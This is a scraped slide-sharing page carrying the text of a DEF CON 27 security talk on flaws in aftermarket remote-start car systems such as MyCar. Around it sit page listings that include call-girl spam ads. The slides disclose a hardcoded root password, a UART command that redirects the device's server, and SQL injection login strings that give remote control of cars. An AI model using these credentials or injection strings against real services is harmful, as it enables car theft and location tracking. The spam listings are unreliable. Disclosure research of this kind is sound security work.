Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 

Recently uploaded (20)

AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 

DEF CON 27 - JMAXXZ - your car is my car

  • 1. Your Car Is My Car
  • 2. About me ● Software Engineer by trade ● Hacker by passion ● Lock picker for fun ● The best puzzles are not meant to be solved ● All opinions are my own, and may not reflect those of my past, present, or future employers ● Twitter: @Jmaxxz
  • 4.
  • 6.
  • 7.
  • 8.
  • 9. Traditional car ignitions ● Lock + Switch Image source: https://www.autozone.com/batteries-starting-and-charging/ignition-switch/duralast-ignition-switch/342354_0
  • 10. "Modern" Car Ignitions ● Lock + Electronic Lock + Switch
  • 11.
  • 12.
  • 13.
  • 15.
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22. 0C 0E 03 32 03 FF FF F1 35 0D Start Sentinel End Sentinel Direction (I.E. Garbage) Command Length Payload (Address) Checksum
  • 23. Demos
  • 24. Particle.io firmware can be found at: https://github.com/jmaxxz/OpenRemoteStart
  • 26.
  • 27. MyCar AKA ● Linkr-LT1 ● MyCar Kia ● Visions MyCar ● Carlink (CL6)
  • 28.
  • 29. How does this happen?
  • 30. RX TX
  • 31. Tips for using Uart ● 3.3v 115200 baud uart ● Change server AT+XIP="173.27.224.18",46033 ● root password is oelinux123 ● https://fccid.io/2AEB4AG21/User-Manual/User-manual-3104674 RX TX
  • 32.
  • 33.
  • 34.
  • 35.
  • 36.
  • 37.
  • 38.
  • 39.
  • 40.
  • 41.
  • 42. Demo Example Vectors Untargeted (admin) UserName: API Password: f") OR "1"<>"1 Targeted UserName: example@example.com" OR ("1"<>"1 Password: a") OR "1"<>"1
  • 43.
  • 44.
  • 45.
  • 46.
  • 48. Demo
  • 50. No Direct Object Reference?
  • 52. Duplicate Info Can Lead to Bugs // Case 3 if(USER_EMAIL owns ACCOUNT_ID) { DoCommand(); } // Case 4 if(USER_EMAIL owns ACCOUNT_ID AND ACCOUNT_ID owns DEVICE_ID){ DoCommand(); } // Case 1 if(USER_EMAIL owns DEVICE_ID){ DoCommand(); } // Case 2 if(ACCOUNT_ID owns DEVICE_ID){ DoCommand(); }
  • 54. An attacker could Remotely ● Locate car ● Unlock car ● Start car ● Lock car ● Trigger alarm ● Edit car ● Check the status of any command
  • 55. MyCar's Fix For Hardcoded Password Old: New:
  • 56. Reverse Proxies Don't Fix Everything
  • 57.
  • 58.
  • 59.
  • 60. MyCar shows your car's current location
  • 62. And track the most common places you visit
  • 63.
  • 64. Unlike public cloud environments that battle for priority, Procon Analytics use virtual private cloud that supports only our customers and applications with no interference from other users. This dedicated, highly secure environment ensures higher availability and faster delivery of service. ... When you partner with Procon Analytics, you can be assured that your data is secure and protected.
  • 65.
  • 66.
  • 67. How does this happen? How do we stop it?
  • 68. ● https://fortin.ca/en/evo-one.html [Evo One page on Fortin website] ● https://commons.wikimedia.org/wiki/File:Raynauld.jpg [image of hand with Raynaulds] ● http://www.lescodistributing.com/1117_Omega.pdf [Image of LINKR-LT1 ad] ● https://www.autozone.com/batteries-starting-and-charging/ignition-switch/duralast-ignition-switch/342354_0 [Ignition switch] ● https://cdn02.fortin.ca/download/57211/evo-one_ig_tha_bi_sub1-forester-wrx-sti-2015_key_b_57211.pdf [Fortin One install manual Subaru Impreza 2012] ● https://fortin.ca/download/64631/omega-linkr-lt1-install-guide-64631.pdf [omega linkr-lt1 install guide] ● https://www.chicagotribune.com/suburbs/lake-county-news-sun/ct-keyless-ignition-risk-met-20150618-story.html [Remote Started car almost kills couple, CO poisoning] ● https://www.youtube.com/watch?v=6kwQtugSZ9g [Mustang Accident, Remote Starter] ● https://www.youtube.com/watch?v=j6Wntha7ft8 [Top 3 Ways Thieves Steal Cars] ● https://www.youtube.com/watch?v=2v5dNCR7NJ4 [Gone in Under 60 seconds...Auto/Truck Theft] ● https://fortin.ca/en/qa/87632/can-get-datalink-protocol-and-technical-specs-if-looking-develop-remote-start-interface-device ● http://phillipsind.com/media_relations/press_releases/1273 ● http://connected-holdings.com/portfolio_page ● https://proconanalytics.com/ ● https://en.wikipedia.org/wiki/The_Market_for_Lemons ● https://www.iii.org/fact-statistic/facts-statistics-auto-theft [Car theft data for USA] ● Thanks to Twitter: @lizzymcfarland [For proofreading my bio and abstract] Sources + Misc links